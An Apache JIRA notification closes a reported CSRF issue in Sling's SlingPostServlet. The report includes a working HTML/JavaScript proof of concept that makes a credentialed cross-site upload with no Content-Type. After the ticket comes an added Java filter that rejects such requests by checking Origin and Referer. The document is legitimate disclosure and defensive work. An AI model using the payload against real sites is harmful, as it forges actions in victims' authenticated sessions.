[ https://issues.apache.org/jira/browse/SLING-5957?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Carsten Ziegeler resolved SLING-5957.
-------------------------------------
    Resolution: Not A Problem

> SlingPostServlet: susceptible to CSRF with empty content-type
> -------------------------------------------------------------
>
>                 Key: SLING-5957
>                 URL: https://issues.apache.org/jira/browse/SLING-5957
>             Project: Sling
>          Issue Type: Bug
>          Components: Servlets
>            Reporter: Dominique Jäggi
>              Labels: csrf, security
>
> The _SlingPostServlet_ creates a resource from a cross-site request like so:
> {code}
> <html>
> <body>
> <script>
> function submitRequest()
> {
>   var xhr = new XMLHttpRequest();
>   xhr.open("POST", "http://localhost:8080/test/csrf.txt", true);
>   xhr.withCredentials = true;
>   var body = "This file has been uploaded via CSRF.=\r\n";
>   var aBody = new Uint8Array(body.length);
>   for (var i = 0; i < aBody.length; i++)
>     aBody[i] = body.charCodeAt(i);
>   xhr.send(new Blob([aBody]));
> }
> </script>
> <form action="#">
>   <input type="button" value="Submit request" onclick="submitRequest();" />
> </form>
> </body>
> </html>
> {code}

--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
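The request above carries no Content-Type header at all, so a server-side check on Content-Type alone cannot tell it apart from a same-site form post. As an added defensive illustration (this is not Sling's own code and not part of the ticket; the class name, the `localhost:8080` allow-list and the use of the `javax.servlet` API are assumptions), a servlet filter that ignores Content-Type and instead gates state-changing methods on the Origin header, falling back to Referer, and fails closed when neither names an allowed host:

```java
import java.io.IOException;
import java.net.URI;
import java.util.Set;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/** Illustrative filter: rejects state-changing requests not sent from an allowed host. */
public class OriginCheckFilter implements Filter {
    private static final Set<String> SAFE_METHODS = Set.of("GET", "HEAD", "OPTIONS", "TRACE");
    // Assumed allow-list (hypothetical); a real deployment would load it from configuration.
    private static final Set<String> ALLOWED_HOSTS = Set.of("localhost:8080");

    /** Pure decision logic, kept free of the servlet API so it is easy to unit-test. */
    static boolean isAllowed(String method, String origin, String referer, Set<String> allowedHosts) {
        if (method != null && SAFE_METHODS.contains(method.toUpperCase())) {
            return true;                       // read-only methods: nothing to protect
        }
        // Browsers send Origin on cross-site XHR/fetch; fall back to Referer for plain forms.
        String source = (origin != null) ? origin : referer;
        if (source == null) {
            return false;                      // no provenance at all: fail closed
        }
        try {
            URI u = URI.create(source);        // the literal "null" Origin has no host -> rejected
            if (u.getHost() == null) {
                return false;
            }
            String hostPort = (u.getPort() == -1) ? u.getHost() : u.getHost() + ":" + u.getPort();
            return allowedHosts.contains(hostPort);
        } catch (IllegalArgumentException e) {
            return false;                      // malformed header value: fail closed
        }
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest http = (HttpServletRequest) req;
        if (isAllowed(http.getMethod(), http.getHeader("Origin"), http.getHeader("Referer"), ALLOWED_HOSTS)) {
            chain.doFilter(req, res);
        } else {
            ((HttpServletResponse) res).sendError(HttpServletResponse.SC_FORBIDDEN, "cross-site request rejected");
        }
    }

    @Override public void init(FilterConfig cfg) { }
    @Override public void destroy() { }
}
```

With this in front of the POST servlet, the cross-site XHR in the ticket arrives with an Origin naming the attacker-controlled page and is answered with 403 before any resource is created, while same-site requests from `localhost:8080` pass through unchanged.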